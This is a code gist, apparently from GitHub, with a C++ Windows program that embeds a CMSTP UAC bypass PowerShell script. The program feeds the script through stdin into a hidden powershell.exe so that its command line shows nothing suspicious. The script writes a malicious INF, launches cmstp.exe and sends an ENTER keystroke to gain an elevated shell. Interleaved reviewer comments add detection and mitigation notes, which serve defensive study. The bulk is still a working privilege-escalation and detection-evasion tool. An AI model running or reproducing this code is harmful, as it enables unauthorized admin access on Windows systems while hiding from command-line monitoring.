@aaaddress1
Created October 24, 2024 15:06
創建無敏感參數 PowerShell 進程並自動化逐行輸入 CMSTP UAC 提權指令完成提權
#include <windows.h>
#include <iostream>
// CMSTP UAC Bypass PowerShell Version.
// ref: https://github.com/tylerapplebaum/CMSTP-UACBypass/blob/master/UACBypassCMSTP.ps1
// Embedded PowerShell script that WinMain below feeds into powershell.exe's
// stdin, so none of it appears on the child's command line. It is the
// UACBypassCMSTP.ps1 referenced above, kept as one concatenated string
// literal; the script text is untouched and only C++ comments are added
// between the pieces as reviewer notes (risk, detection, mitigation).
auto cmstp_uacbypass_ps1 = "# UAC Bypass poc using SendKeys\n"
"# Version 1.0\n"
"# Author: Oddvar Moe\n"
"# Functions borrowed from: https://powershell.org/forums/topic/sendkeys/\n"
"# Todo: Hide window on screen for stealth\n"
"# Todo: Make script edit the INF file for command to inject...\n"
"\n"
"\n"
// Set-INFFile: writes an INF (default path $env:temp\CMSTP.inf) whose
// [RunPreSetupCommandsSection] launches powershell.exe and then kills
// cmstp.exe. Detection: an INF created under %TEMP% followed by a cmstp.exe
// launch, and powershell.exe whose parent process is cmstp.exe.
"Function script:Set-INFFile {\n"
"[CmdletBinding()]\n"
"\tParam (\n"
"\t[Parameter(HelpMessage=\"Specify the INF file location\")]\n"
"\t$InfFileLocation = \"$env:temp\\CMSTP.inf\",\n"
"\t\n"
"\t[Parameter(HelpMessage=\"Specify the command to launch in a UAC-privileged window\")]\n"
"\t[String]$CommandToExecute = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n"
"\t)\n"
"\n"
"$InfContent = @\"\n"
"[version]\n"
"Signature=`$chicago`$\n"
"AdvancedINF=2.5\n"
"\n"
"[DefaultInstall]\n"
"CustomDestination=CustInstDestSectionAllUsers\n"
"RunPreSetupCommands=RunPreSetupCommandsSection\n"
"\n"
// Commands in this section are executed by cmstp.exe itself (per the
// HelpMessage above, in a UAC-privileged context); the taskkill line then
// terminates cmstp.exe.
"[RunPreSetupCommandsSection]\n"
"; Commands Here will be run Before Setup Begins to install\n"
"$CommandToExecute -NoExit echo 'hello from Evil Admin >:)'\n"
"taskkill /IM cmstp.exe /F\n"
"\n"
"[CustInstDestSectionAllUsers]\n"
"49000,49001=AllUSer_LDIDSection, 7\n"
"\n"
"[AllUSer_LDIDSection]\n"
"\"HKLM\", \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\CMMGR32.EXE\", \"ProfileInstallPath\", \"%UnexpectedError%\", \"\"\n"
"\n"
"[Strings]\n"
"ServiceName=\"CorpVPN\"\n"
"ShortSvcName=\"CorpVPN\"\n"
"\n"
"\"@\n"
"\n"
// The INF is written as ASCII to $InfFileLocation.
"$InfContent | Out-File $InfFileLocation -Encoding ASCII\n"
"}\n"
"\n"
"\n"
// Get-Hwnd: returns an object with ProcessName and the MainWindowHandle of
// the named process; Hwnd is $null when Get-Process fails.
"Function Get-Hwnd\n"
"{\n"
" [CmdletBinding()]\n"
" \n"
" Param\n"
" (\n"
" [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $ProcessName\n"
" )\n"
" Process\n"
" {\n"
" $ErrorActionPreference = 'Stop'\n"
" Try \n"
" {\n"
" $hwnd = Get-Process -Name $ProcessName | Select-Object -ExpandProperty MainWindowHandle\n"
" }\n"
" Catch \n"
" {\n"
" $hwnd = $null\n"
" }\n"
" $hash = @{\n"
" ProcessName = $ProcessName\n"
" Hwnd = $hwnd\n"
" }\n"
" \n"
" New-Object -TypeName PsObject -Property $hash\n"
" }\n"
"}\n"
"\n"
// Set-WindowActive: compiles a user32 P/Invoke shim with Add-Type
// (ShowWindow / SetForegroundWindow) and brings the named process's window
// to the foreground. Add-Type -MemberDefinition is itself a useful
// telemetry point. NOTE(review): $onTop below is assigned but never used.
"function Set-WindowActive\n"
"{\n"
" [CmdletBinding()]\n"
"\n"
" Param\n"
" (\n"
" [Parameter(Mandatory = $True, ValueFromPipelineByPropertyName = $True)] [string] $Name\n"
" )\n"
" \n"
" Process\n"
" {\n"
" $memberDefinition = @'\n"
" [DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);\n"
" [DllImport(\"user32.dll\", SetLastError = true)] public static extern bool SetForegroundWindow(IntPtr hWnd);\n"
"\n"
"'@\n"
"\n"
" Add-Type -MemberDefinition $memberDefinition -Name Api -Namespace User32\n"
" $hwnd = Get-Hwnd -ProcessName $Name | Select-Object -ExpandProperty Hwnd\n"
" If ($hwnd) \n"
" {\n"
" $onTop = New-Object -TypeName System.IntPtr -ArgumentList (0)\n"
" [User32.Api]::SetForegroundWindow($hwnd)\n"
" [User32.Api]::ShowWindow($hwnd, 5)\n"
" }\n"
" Else \n"
" {\n"
" [string] $hwnd = 'N/A'\n"
" }\n"
"\n"
" $hash = @{\n"
" Process = $Name\n"
" Hwnd = $hwnd\n"
" }\n"
" \n"
" New-Object -TypeName PsObject -Property $hash\n"
" }\n"
"}\n"
"\n"
// Script body: write the INF, start "cmstp.exe /au <inf>", spin in an
// empty do/until loop (burns CPU) until the cmstp window exists, focus it,
// and send ENTER through System.Windows.Forms.SendKeys.
// Detection: cmstp.exe started with /au on an INF outside %SystemRoot%,
// followed by window-focus and synthetic keystrokes from the same session.
// Mitigation (reviewer note, not from the page): UAC at "Always notify"
// prompts even for auto-elevating binaries, and application control rules
// on cmstp.exe remove this primitive — confirm against your baseline.
". Set-INFFile\n"
"#Needs Windows forms\n"
"add-type -AssemblyName System.Windows.Forms\n"
"If (Test-Path $InfFileLocation) {\n"
"#Command to run\n"
"$ps = new-object system.diagnostics.processstartinfo \"c:\\windows\\system32\\cmstp.exe\"\n"
"$ps.Arguments = \"/au $InfFileLocation\"\n"
"$ps.UseShellExecute = $false\n"
"\n"
"#Start it\n"
"[system.diagnostics.process]::Start($ps)\n"
"\n"
"do\n"
"{\n"
"\t# Do nothing until cmstp is an active window\n"
"}\n"
"until ((Set-WindowActive cmstp).Hwnd -ne 0)\n"
"\n"
"\n"
"#Activate window\n"
"Set-WindowActive cmstp\n"
"\n"
"#Send the Enter key\n"
"[System.Windows.Forms.SendKeys]::SendWait(\"{ENTER}\")\n"
"}\n"
// Shown by the original, non-elevated ("Low IL") PowerShell instance.
"[System.Windows.Forms.MessageBox]::Show('Hello from Low IL' , '3Ocm.tw')\n"
"\n";
// Entry point (GUI subsystem, no console of its own). Spawns a hidden
// powershell.exe whose command line is only "powershell.exe -NoExit", feeds
// the script above through a stdin pipe, and echoes the child's
// stdout/stderr. Detection note: command-line based rules see nothing but
// "-NoExit"; the process chain (this exe -> powershell.exe -> cmstp.exe ->
// powershell.exe) is the robust signal. NOTE(review): PowerShell script
// block logging, where enabled, should still record script text executed
// from stdin — confirm against your logging baseline.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
// PowerShell command line: deliberately carries no script or encoded command.
wchar_t powershellCmd[] = L"powershell.exe -NoExit";
// Locals.
STARTUPINFOW si;
PROCESS_INFORMATION pi;
SECURITY_ATTRIBUTES sa;
// Pipe ends are named from the pipe's point of view: the child receives
// hStdInRead and hStdOutWrite, the parent keeps hStdInWrite and hStdOutRead.
HANDLE hStdInRead, hStdInWrite, hStdOutRead, hStdOutWrite;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
memset(&pi, 0, sizeof(pi));
memset(&sa, 0, sizeof(sa));
sa.nLength = sizeof(sa);
// Handles are created inheritable so the child can receive its pipe ends.
sa.bInheritHandle = TRUE;
// Create the pipes. Return values are not checked; on failure the handles
// below are left uninitialized.
CreatePipe(&hStdOutRead, &hStdOutWrite, &sa, 0);
// Parent-side ends are made non-inheritable so they do not leak into the child.
SetHandleInformation(hStdOutRead, HANDLE_FLAG_INHERIT, 0);
CreatePipe(&hStdInRead, &hStdInWrite, &sa, 0);
SetHandleInformation(hStdInWrite, HANDLE_FLAG_INHERIT, 0);
// Configure STARTUPINFO: redirect stdin, stdout and stderr to the pipes.
si.dwFlags = STARTF_USESTDHANDLES;
si.hStdOutput = hStdOutWrite;
si.hStdError = hStdOutWrite;
si.hStdInput = hStdInRead;
// Create the PowerShell process with handle inheritance on and
// CREATE_NO_WINDOW so no console window appears. The return value is not
// checked, so pi stays all zeros if creation failed.
CreateProcessW(NULL, (LPWSTR)powershellCmd, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
// Close the child-side ends in the parent; otherwise ReadFile below could
// not observe EOF when the child closes its stdout.
CloseHandle(hStdOutWrite);
CloseHandle(hStdInRead);
// Write the whole script to the child's stdin in a single call. strlen's
// size_t is narrowed to DWORD and `written` is never compared against it.
const char* command = cmstp_uacbypass_ps1;
DWORD written;
WriteFile(hStdInWrite, command, strlen(command), &written, NULL);
// Read the child's output until it closes its end. With -NoExit the child
// stays alive after the script completes, and hStdInWrite is closed only
// after this loop, so loop exit depends on the child closing its stdout.
CHAR buffer[4096];
DWORD read;
while (ReadFile(hStdOutRead, buffer, sizeof(buffer) - 1, &read, NULL) && read > 0) {
buffer[read] = '\0';
// A WinMain program has no console attached by default, so this output is
// only visible if one exists — NOTE(review): likely discarded as built.
std::cout << buffer;
}
// Close the remaining handles.
CloseHandle(hStdInWrite);
CloseHandle(hStdOutRead);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return 0;
}